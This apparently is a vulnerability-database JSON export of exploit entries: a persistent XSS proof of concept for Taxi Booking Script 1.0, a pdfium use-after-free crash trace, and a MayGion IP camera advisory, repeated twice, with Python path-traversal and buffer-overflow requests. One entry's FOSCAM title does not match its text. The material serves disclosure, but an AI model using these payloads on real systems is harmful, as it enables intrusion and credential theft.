{"zdt": [{"lastseen": "2018-03-13T23:21:16", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-01-12T00:00:00", "published": "2018-01-12T00:00:00", "href": "https://0day.today/exploit/description/29457", "id": "1337DAY-ID-29457", "title": "Taxi Booking Script 1.0 - Cross-site Scripting Vulnerability", "type": "zdt", "sourceData": "# # # # #\r\n# Exploit Title: Taxi Booking Script v1.0 - Cross-site Scripting (XSS)\r\n# Vendor Homepage: https://www.phpjabbers.com/taxi-booking-script/\r\n# Software Link: \r\n# Demo: http://demo.phpjabbers.com/1515648238_792/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: Windows 10\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Tauco\r\n \r\nDescription:\r\n===========================================================================\r\nThe malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site. \r\n \r\nPOC:\r\n \r\nExploit code(s):\r\n===============\r\n \r\nPersistent XSS:\r\n1. user_update=1&id=2&role_id=1&email=admin%40a.com&password=1231231&name=<script>window.location='https://www.google.com/search?q=xss'</script>&phone=123131&status=T\r\n \r\n2. booking_update=1&id=3&tab_id=tabs-1&uuid=<script>window.location='https://www.google.com/search?q=xss'</script>&booking_date=11-01-2018 13:06&pickup_address=<script>window.location='https://www.google.com/search?q=xss'</script>&return_address=Santa Fe 1236, Rosario, Santa Fe Province, Argentina&distance=123&fleet_id=1&passengers=1&luggage=1&extra_id[]=1&sub_total=374.40&tax=37.44&total=411.84&deposit=41.18&payment_method=bank&cc_type=&cc_num=&cc_exp_month=&cc_exp_year=&cc_code=&status=cancelled&client_id=5&c_fname=asd&c_lname=asd&c_phone=12&c_email=asda&c_company=dasdasd&c_address=asda&c_city=asdasd&c_state=asdasda&c_zip=1212&c_country=&c_notes=asdad&c_airline_company=adsad&c_flight_number=adsasd&c_flight_time=13:05&c_terminal=1\r\n \r\n \r\nSeverity Level:\r\n=========================================================\r\nHigh\r\n \r\n \r\nDescription:\r\n==========================================================\r\n \r\n \r\nRequest Method(s): [+] POST & GET\r\n \r\n \r\nVulnerable Product: [+] Taxi Booking Script v1.0\r\n \r\n \r\nVulnerable Parameter(s): [+] name, uuid, pickup_address\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29457"}, {"lastseen": "2018-01-10T09:13:27", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "href": "https://0day.today/exploit/description/25813", "id": "1337DAY-ID-25813", "type": "zdt", "title": "pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=613\r\n \r\nThe following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:\r\n \r\n--- cut ---\r\n$ ./pdfium_test asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed \r\nRendering PDF file asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed.\r\nNon-linearized path...\r\n=================================================================\r\n==22386==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000001160 at pc 0x000000b604dc bp 0x7ffd824f3c70 sp 0x7ffd824f3c68\r\nREAD of size 8 at 0x606000001160 thread T0\r\n #0 0xb604db in opj_t2_read_packet_header third_party/libopenjpeg20/t2.c:874:54\r\n #1 0xb5edd9 in opj_t2_decode_packet third_party/libopenjpeg20/t2.c:536:15\r\n #2 0xb5e06c in opj_t2_decode_packets third_party/libopenjpeg20/t2.c:422:39\r\n #3 0xb1b309 in opj_tcd_t2_decode third_party/libopenjpeg20/tcd.c:1555:15\r\n #4 0xb1adc1 in opj_tcd_decode_tile third_party/libopenjpeg20/tcd.c:1294:15\r\n #5 0xa5ef5f in opj_j2k_decode_tile third_party/libopenjpeg20/j2k.c:8065:15\r\n #6 0xa9d214 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9596:23\r\n #7 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41\r\n #8 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15\r\n #9 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8\r\n #10 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10\r\n #11 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11\r\n #12 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10\r\n #13 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24\r\n #14 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5\r\n #15 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13\r\n #16 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7\r\n #17 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13\r\n #18 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11\r\n #19 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17\r\n #20 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7\r\n #21 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7\r\n #22 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10\r\n #23 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13\r\n #24 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3\r\n #25 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3\r\n #26 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3\r\n #27 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3\r\n #28 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9\r\n #29 0x4f16e9 in main samples/pdfium_test.cc:608:5\r\n \r\n0x606000001160 is located 0 bytes inside of 49-byte region [0x606000001160,0x606000001191)\r\nfreed by thread T0 here:\r\n #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61\r\n #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61\r\n #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31\r\n #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23\r\n #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41\r\n #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15\r\n #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8\r\n #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10\r\n #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11\r\n #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10\r\n #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24\r\n #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5\r\n #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13\r\n #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7\r\n #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13\r\n #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11\r\n #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17\r\n #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7\r\n #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7\r\n #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10\r\n #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13\r\n #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3\r\n #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3\r\n #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3\r\n #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3\r\n #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9\r\n #26 0x4f16e9 in main samples/pdfium_test.cc:608:5\r\n #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61\r\n #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61\r\n #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31\r\n #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23\r\n #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41\r\n #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15\r\n #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8\r\n #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10\r\n #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11\r\n #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10\r\n #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24\r\n #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5\r\n #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13\r\n #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7\r\n #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13\r\n #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11\r\n #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17\r\n #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7\r\n #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7\r\n #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10\r\n #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13\r\n #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3\r\n #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3\r\n #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3\r\n #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3\r\n #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9\r\n #26 0x4f16e9 in main samples/pdfium_test.cc:608:5\r\n #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free third_party/libopenjpeg20/t2.c:874:54 in opj_t2_read_packet_header\r\nShadow bytes around the buggy address:\r\n 0x0c0c7fff81d0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa\r\n 0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa\r\n 0x0c0c7fff81f0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00\r\n 0x0c0c7fff8200: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa\r\n 0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa\r\n=>0x0c0c7fff8220: 00 00 00 00 00 00 00 fa fa fa fa fa[fd]fd fd fd\r\n 0x0c0c7fff8230: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c0c7fff8240: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa\r\n 0x0c0c7fff8250: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00\r\n 0x0c0c7fff8260: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c0c7fff8270: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==22386==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://code.google.com/p/chromium/issues/detail?id=551470. Attached is the PDF file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39401.zip\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/25813", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-10T09:47:16", "bulletinFamily": "exploit", "description": "MayGion IP cameras suffer from path traversal and buffer overflow vulnerabilities.", "modified": "2013-05-29T00:00:00", "published": "2013-05-29T00:00:00", "id": "1337DAY-ID-20823", "href": "https://0day.today/exploit/description/20823", "type": "zdt", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "sourceData": "MayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20823"}], "seebug": [{"lastseen": "2017-11-19T14:17:39", "bulletinFamily": "exploit", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. *References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80695", "id": "SSV:80695", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T15:04:06", "bulletinFamily": "exploit", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote 